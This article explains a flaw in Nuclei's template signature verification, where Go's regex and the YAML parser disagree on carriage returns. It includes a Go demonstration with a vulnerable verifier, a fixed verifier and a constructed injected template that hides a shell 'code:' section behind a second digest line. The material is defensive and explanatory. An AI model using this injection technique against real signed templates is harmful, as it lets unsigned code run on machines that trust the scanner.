Spoofing Nuclei’s template verification
Nuclei has over 21,000 stars on GitHub and over 2.1 million downloads. The scanner uses "templates", YAML files that define specific tests or checks for the vulnerability scanning process. Ensuring the authenticity of these templates is essential to avoid tampered or malicious templates that mislead or compromise the scan.
Nuclei has a Go regex-based signature verification process in place to ensure authenticity. The flaw stems from a discrepancy between how the signature verification process and the YAML parser handle newline characters, ProjectDiscovery explained. While Go's verification logic treats a carriage return ("\r") as part of the same line, the YAML parser treats it as a line break, leaving room for attackers to insert malicious code.
This, combined with the fact that Nuclei handled multiple "digest:" signature lines incorrectly, can potentially allow an attacker to inject malicious content into a template while keeping the signature valid for the harmless portion of the template.
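The following Go program is an added illustration of the mismatch described above; it is not Nuclei's code. It models the two ingredients the article names: a multi-line Go regex that treats "\r" as part of the digest line (in RE2, "." matches "\r" and, under (?m), "$" stops only before "\n"), and a verifier that reads the signature from the first digest line but strips every digest line before hashing. The "signature" is a plain SHA-256 stand-in for the real asymmetric signature, the YAML parser's line splitting is modelled by a small helper rather than a YAML library, and the template text and payload are constructed for the example. verifyFixed shows one way to close the gap: normalize line endings exactly as the YAML parser would before matching, and accept exactly one digest line.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// digestLine models a multi-line Go regex used to locate the "# digest:" trailer.
// In Go's RE2 syntax '.' matches '\r' but not '\n', and with (?m) '$' matches only
// before '\n', so a '\r' does NOT end the line as far as the regex is concerned.
var digestLine = regexp.MustCompile(`(?m)^# digest: (.+)$`)

// canonical is the content a signature covers: the template with all digest
// lines removed and surrounding whitespace trimmed (assumption of this model).
func canonical(stripped string) string {
	return strings.TrimSpace(stripped)
}

// digest stands in for the real signature: hex SHA-256 over the canonical body.
// The line-handling mismatch does not depend on the signature algorithm.
func digest(body string) string {
	sum := sha256.Sum256([]byte(body))
	return hex.EncodeToString(sum[:])
}

// signTemplate appends a digest trailer to a template body (body ends with '\n').
func signTemplate(body string) string {
	return body + "# digest: " + digest(canonical(body)) + "\n"
}

// verifyVulnerable models the flawed flow: the signature is taken from the FIRST
// digest line, while ALL regex-matched digest lines are stripped before hashing.
// Anything hidden after a '\r' on a later digest line is stripped along with it.
func verifyVulnerable(tpl string) bool {
	m := digestLine.FindStringSubmatch(tpl)
	if m == nil {
		return false
	}
	stripped := digestLine.ReplaceAllString(tpl, "")
	return digest(canonical(stripped)) == m[1]
}

// normalizeNewlines folds CRLF and lone CR into LF, which is how a YAML parser
// treats line breaks (CR, LF and CRLF are all breaks in the YAML spec).
func normalizeNewlines(s string) string {
	s = strings.ReplaceAll(s, "\r\n", "\n")
	return strings.ReplaceAll(s, "\r", "\n")
}

// yamlLines models the lines a YAML parser would see: "# ..." lines are
// comments, everything that follows a CR is a fresh line of real content.
func yamlLines(tpl string) []string {
	norm := strings.TrimSuffix(normalizeNewlines(tpl), "\n")
	return strings.Split(norm, "\n")
}

// verifyFixed normalizes line endings before matching so the regex and the
// YAML parser agree on where lines end, and insists on exactly one digest line.
func verifyFixed(tpl string) bool {
	norm := normalizeNewlines(tpl)
	matches := digestLine.FindAllStringSubmatch(norm, -1)
	if len(matches) != 1 {
		return false
	}
	stripped := digestLine.ReplaceAllString(norm, "")
	return digest(canonical(stripped)) == matches[0][1]
}

// injectedTemplate appends a second digest line whose "value" hides CR-separated
// YAML. Constructed payload for illustration; it only has to parse as YAML lines.
func injectedTemplate(signed string) string {
	return signed + "# digest: x\rcode:\r  - engine: [sh]\r    source: id\n"
}

func main() {
	benign := "id: benign-check\ninfo:\n  name: harmless\n" // constructed sample
	signed := signTemplate(benign)
	injected := injectedTemplate(signed)

	fmt.Println("benign verifies (vulnerable):  ", verifyVulnerable(signed))
	fmt.Println("injected verifies (vulnerable):", verifyVulnerable(injected))
	fmt.Println("injected verifies (fixed):     ", verifyFixed(injected))
	fmt.Println("lines the YAML parser sees:")
	for _, l := range yamlLines(injected) {
		fmt.Printf("  %q\n", l)
	}
}
```

The vulnerable verifier accepts the injected template because the hash is computed over exactly the same bytes as for the signed benign template, while the YAML view of the same bytes contains a "code:" section that was never signed. Note that a lone "\r" on the first digest line is not enough on its own here: the captured signature value would then include the payload and fail to match, which is why the article describes the bug as the newline discrepancy combined with the handling of multiple digest lines.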